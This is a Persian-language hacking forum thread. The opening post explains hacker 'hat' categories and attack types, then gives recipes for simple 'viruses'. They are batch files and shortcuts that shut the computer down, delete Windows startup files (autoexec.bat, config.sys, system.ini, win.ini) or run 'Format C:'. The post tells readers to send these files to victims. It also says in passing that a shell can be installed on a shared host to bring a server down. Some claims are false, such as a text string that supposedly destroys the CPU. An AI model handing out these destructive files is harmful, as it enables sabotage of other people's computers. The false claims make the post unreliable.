نمایش نتایج: از شماره 1 تا 4 , از مجموع 4

موضوع: مقدمات هک و امنیت شبکه

  1. #1
    مدیر بازنشسته
    تاریخ عضویت
    2009/08/26
    محل سکونت
    مریخ , شهر دوستی , خیابان معرفت , کوچه وفا , منزل عشق
    نوشته ها
    5,051

    24 مقدمات هک و امنیت شبکه+آموزش ساخت چند ویروس ساده

    نکته 1 :

    هکرها و دسته بندی حملات آنها

    انواع هکرها:

    1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه 100 ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
    به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!


    2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند( در انتهای همین مقاله انواع راه های نفوذگری بحث شده). مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا ایمیل دختر رییس دانشگاه رو از اون تو کش بره و نامه نگاری عاشقانه راه بندازه و یا اصلا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!


    3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.

    4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!



    انواع حمله هکرها:
    - استراق سمع (interception) : در این روش نفوذگر موفق شده که در حین تبادل اطلاعات گوش کند. وی مخفیانه این اطلاعات را مورد نظر داشته و اطلاعات مورد نیاز را برای خودش نسخه برداری می کند. تکنیک ها و روش های بسیاری را هکرها در استراق سمع به کار می برند که یکی از آنها همان sniff بود که در مقاله چند روز قبل کوتاه به آن اشاره کردم. بگذارید مثالی بزنم تا 2 زاریتان کاملا بیفتد. شما در حال مخ زدن در روی اینترنت هستید و شبهای متمادی وقت گذاشتید مخ این دختره رو بزنید و شمارش رو بگیرید. در حال چت کردن هستید که بالاخره عروس خانوم شماره رو به شما میده و شما خوشحال که فردا حتما بهش زنگ می زنید. اما شمای بدبخت نمی دونید که یه هکری ناقلایی کامپیوتر شما رو زیر نظر داره و کلیه چت های شما و اون خانوم رو داره می بینه. اون هکره داره استراق سمع می کنه. حرفاتون براش دلچسب نیست ولی به محض دیدن اون شماره تلفن براش جالب توجه میشه! اینکه شماره تلفن رو یادداشت می کنه و فردا زنگ می زنه به دختره و همون صبحش قرار می گذاره و عشق و حالی که نگو. سر بدبخت شما هم کلاه میره. این جوریاس دیگه. باید زندگی کرد!!!
    - دستکاری اطلاعات (modification ): نفوذگر عزیزمون موفق به تغییر اطلاعات میشه. در اینجا بدون اطلاع از قربانی بدبخت, هکر ما اطلاعات رو تغییر میده. مثلا یکی بیاد و بره داخل لیست نمرات یک دانشگاه و نمراتش رو همچین یک حال اساسی بهشون بده و معدلش از 13 بشه 18!

    - افزودن اطلاعات و جعل ( fabrication ): در این روش نفوذگر اطلاعات رو به سرقت نمی بره و یا جایگرین نمی کنه بلکه به اطلاعات فقط اطلاعات دیگری رو اضافه می کنه. مثلا فرض کنید مدیر شرکتی نامه ای می زنه به مسوول خرید و لیست خریدی برای شرکت میده. حال شما که هکر بسیار زرنگی هستید این نامه رو جعل کرده و یه سری چیزها بهش اضافه می کنید مثلا می نویسید که خرید یک میز جدید برای آقایی که خودتون باشید! و بعد نامه رو می فرستید برای مامور خرید. مامور خرید بی نوا هم میره لیست رو تهیه می کنه. به واقع شما در اینجا اطلاعات حاوی اون نامه رو همون طور که هست می گذارید باشه ولی بهش مطالب جدید هم اضافه می کنید. هرچند می شه این اقدام رو در زیر شاخه modification آورد اما میگم شما زیاد درگیر گروه بندی نشید بلکه مفهوم رو متوجه بشید که به واقع هدف اصلی این مقاله همینه.
    - حمله از نوع وقفه ( interruption): در این نوع حمله هکر باعث اختلال در شبکه و تبادل اطلاعات میشه. تکنیک های بسیاری وجود داره برای هکرها اما 2 مثال بسیار مشهود که نتیجه اش برای یک وبگرد به وضوح مشخصه و در نتیجه همین حملات صورت می گیره یکی در چت رومهاست که گاهی می بیند کسی کامپیوتر سرور چت رو وقفه می ندازه و دیگر شما قادر به چت در آن چت روم نیستید و یا اینکه حتما شنیده اید وقتی هکری به یک سایت حمله کرده و باعث کندی آن سرور شده و این باعث می شود که اگر سایت در عرض 5 ثانیه می بایست در مرورگر شما ظاهر شود یا اصلا قابل بارگزاری نیست (سایت به قول معروف لود نمی شود) و یا اینکه بعد از مثلا 1 دقیقه ظاهر می شود. اینگونه حملات بلای جان کسانی است که مسوول یک سایت و یا شبکه هستند چرا که کندی شبکه همانا و سر و صدای مدیر در آمدن همانا.

    نکته 2 : یه لینوکس نصب کنید رد هت 9 باشه بهتره (باید دستوراتش رو فول باشین واسه اتکینگ لازمه )

    ScanninG & FootPrinting

    اولین کاری که هر هکر میکنه اینه که اول یه سری اطلاعات جامع از طرف در بیاره FootPrinting
    بعد بهترین روش اسکنینگه Scanning
    مثلاً میخوایم در مورد یه سایت اطلاعات به دست بیاریمم اول ازش هویز میگیریم بعد اطلاعات که دستمون اومد یه جور دیگه میشه نگاهمون به سایت نمونه هایی از هویزر ها هم ایناست
    Whois lookup and Domain name searchwww.farahost.comwww.webhost.info
    خیلی زیادن
    بعد با برنامه های اسکنر هم اطلاعاتی که به دست میارید رو اجرا میکنید مثلاً میگه که آی پی فلان سایت اینه میری یا حالا با ایکس اسکن یا با نسوز اسکن رو شروع میکنی
    در صورتی که باگ بهت تحویل داد توی ریپورت هاشون دیگه اینجا بسته به سواد هک خودته یا از توی میلورن یا سکیوریتی فوکوس اکسپلویتشو میگیری یا اینکه اکسپلویت مینویسی
    یا هم اینکه اگه دیدی سرور یکم ضعیفه و شما هم سایتی رو هک نکردید یه هاست ازش میخری شلرتو نصب میکنی و ..... یاعلی سرور خوابید )

    نکات مبهم در این مطلب :

    footprinting چیه ؟! نرم افزار اسکن سراغ ندارم ! بعده اینکه باگ پیدا شد چیکار کنیم ؟!

    برای انجام اسکن به این لینک بروید ... : http://www.xfocus.org/programs/

    طریقه نصب لینوکس رد هت : مراحل نصب لینوکس (red hat)

    نکته 3 : برای آشنایی با عملیات دزدیدن پسورد و account میتوانید به وبلاگ زیر مراجعه کنید : کلبه

    نکته 4 : بهترین روش هک پیدا کردن باگهای سیستم هست. روشهایی مثل تروجان که فقط با چند کلیک معمولی انجام میشه به درد نمی خوره.
    برای اکسپلویت نویسی همباید زبان C و C++ بلد شیم.

    نکته 5 : بچه ها از این لینک کتاب آراز صمدی رو دانلود کنید
    برای شروع بد نیست

    .: Detail information of requested book | &#1570&#1605&#1608&#1586&#1588 &#1602&#1583&#1605 &#1576&#1607 &#1602&#1583&#1605 &#1607&#1705:.




    آموزش ساخت چند ویروس ساده :

    پارت 1 :

    این ویروس هم مثل بلستر پس ازاجرا با دادن مدت زمان 30 ثانیه كامپیوتر شما رو خاموش میكنه.

    برای ساختن این ویروس ابتدا روی صفحه دسكتاب راست كلیك كنید.

    سپس new و بعد از اون text document رو انتخاب كنید.

    سپس وارد این فایل متنی شده و این عبارت رو تایپ كنید.

    Shutdown –r

    حالا از منوی فایل save as رو انتخاب كنید.

    در قسمت file name اسم فایل رو مشخص كنید.

    توجه كنید كه این اسم حتما با پسوند bat باشه.مثل rockboys.bat

    در قسمت encoding شما باید ANSI رو انتخاب كنید.

    حالا save كنید.

    شما میتونید این فایل رو روی خودتون اجرا كنید و نتیجه كار رو ببینید.

    برای اینكه از خاموش شدن كامپیوترتون جلوگیری كنید كافیه در قسمت run عبارت زیر رو تایپ كنید.

    Shutdown –a

    پارت 2 :

    آموزش ساختن بد ترین وآزاردهنده ترین ویروس در دنیا


    1. روی دسک تاپ رایت کلیک کنید وازگزینه ی new - text document را انتخاب کنید.

    2. حالا وارد text document شوید ودر آن عبارت زیررا تایپ کنید.

    cpu_567hjkblaster

    3. بعد از سیو کردن آنرا rename کرده و اسمی برایش انتخاب کنید.

    حالا اگه فایل رو اجرا کنید باید فاتحه ی cpu رو بخونین.

    این دو تا مطلبم اوردم حالشو ببرین البته از جایی اوردم ولی واسه شروع بد نیست

    پارت 3 :

    del autoexec.bat

    del config.sys

    cd winnt

    del system.ini

    del win.ini

    بعد فایل رو با پسوند bat .سیو کنید.

    مثل این : nofooz.bat

    این فایل رو وقتی برای کسی بفرستید هیچی نمیشه ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .

    پارت 4 :

    این ویروس چیز سختی نیست ولی خیلی خطرناكه.

    اول از همه روی دسكتاپ رایت كلیك كنید بعدش New ShortCut بسازید.

    یه صفحه باز میشه در اون بنویسید: Format C:/Autotest

    سپس Next را زده و در صفحه جدید كه باز میشه یه اسم واسه ویروستون انتخاب كنید.

    سپس Next را زده ویه آیكون با سلیقه خودتون برای اون انتخاب كرده و Finish كنید.

    خب دیگه كارمون تمومه حالا اگه اجراش كنین بیچاره میشین.

    اگه خواستین بفهمین چی میشه به جای Format C:/autotest بنویسید

    Format a:/autotest و یه فلاپی كه حاوی اطلاعات هستش در Flopy Drive خود

    قرار دهید بعد اجراش كنید بعد برین سراغ فلاپیتون ببینید چی شده.میبینید فلاپی

    پاك شده ودیگه نه میشه اطلاعات روش ریخت ونه میشه فرمتش كرد.


    پارت 5 :

    این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه

    برای ساختن این ویروس مراحل زیر رو انجام بدید

    به نوت پد رفته و این عبارت رو بنویسید

    del autotexec.bat
    del config.sys
    cd winnt
    del system.ini
    del win.ini
    بعد اونو با فرمت bat سیو کنین و برای قربانی بفرستین



    دوستای عزیز برای دریافت اطلاعات بیشتر می توایند به منابع زیر هم مراجعه کنید :

    Ashiyane Digital Security Members - آموزش هک و امنیت
    ویرایش توسط bos3000 : 2010/03/18 در ساعت 19:42
    :icon_pf(57):

  2. #2
    کاربر سایت
    تاریخ عضویت
    2010/03/04
    محل سکونت
    جم
    نوشته ها
    10

    پیش فرض

    ای ول بابا کارت درسته

  3. #3

    پیش فرض

    agha maro be ghalat kardam nandaz

  4. #4

    پیش فرض

    گل کاشتی دوست من.

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •